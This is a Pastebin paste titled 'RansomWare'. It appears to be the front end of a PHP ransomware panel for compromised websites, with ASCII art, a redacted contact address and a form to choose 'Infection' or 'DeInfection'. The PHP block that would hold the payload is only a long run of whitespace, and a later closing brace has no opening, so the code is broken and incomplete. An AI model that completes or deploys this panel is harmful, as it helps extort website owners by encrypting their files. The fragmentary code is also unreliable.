id_Warzax

RansomWare

Jun 9th, 2018
27,045
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 11.41 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4.    <title>RansomWare</title>
  5. <style type="text/css">
  6. body {
  7.     background: #1A1C1F;
  8.     color: #e2e2e2;
  9. }
  10. .inpute{
  11.     border-style: dotted;
  12.     border-color: green;
  13.     background-color: transparent;
  14.     color: green;
  15.     text-align: center;
  16. }
  17. .selecte{
  18.     border: 0px dotted gray;
  19.     border-color: green;
  20.     background-color: transparent;
  21.     color: green;
  22. }
  23. .submite{
  24.     border: 1px dotted gray;
  25.     border-color: red;
  26.     background-color: transparent;
  27.     color: white;
  28. }
  29. .result{
  30.   text-align: left;
  31. }
  32. </style>
  33. <link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css">
  34. </head>
  35. <body>
  36. <div class="result">
  37. <?php
  38.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
  39. ?>
  40. <center>
  41. <font color="#19f211" style="text-shadow: 3px 3px 9px #19f211; font-size: 12px;">
  42. <pre>
  43.                   .:/+ossso+/:.                  
  44.                :ohddyso+++osyddho-                
  45.             `/hdy+-    ``    `-+hdy:              
  46.            -hdy-    -ohdddy+.    :ydy.            
  47.           :dd+     /dd+..-+dd-    `odh-          
  48.          .dd/      hdo     sds      odh`          
  49.          ody       :/.     -/:      `hd+          
  50.          ydo     -yhhhhhhhhhhhy.     yds          
  51.          yds     +ddddh:`.hdddd:     ydo          
  52.          /dd.    +ddddy  `hdddd:    -dd:          
  53.           ydy`   +ddddd+ oddddd:   .hds          
  54.           `ydy-  -yhhhhhhhhhhhy.  :hds`          
  55.             /hds-               :ydh/            
  56.              `+hdho:.`     `-/ohdy/`              
  57.                 -+shddhhhhdddhs/.                
  58.                     `.-:::-.`                    
  59. </font>                                                  
  60. Ransomeware
  61.  
  62.  -[ Contact : <font color="#19f211" style="text-shadow: 3px 3px 9px #19f211; font-size: 12px;">[email protected] </font>]-
  63. </pre>
  64.  
  65. <form action="" method="post" style=" text-align: center;">
  66.       <select name="method" class="selecte">
  67.          <option value="1">Infection</option>
  68.          <option value="2">DeInfection</option>
  69.       </select>
  70.       <input type="submit" name="submit" class="submite" value="Submit" />
  71. </form>
  72. <?php
  73. }?>
  74. </div>
  75. </body>
Advertisement
Add Comment
Please, Sign In to add comment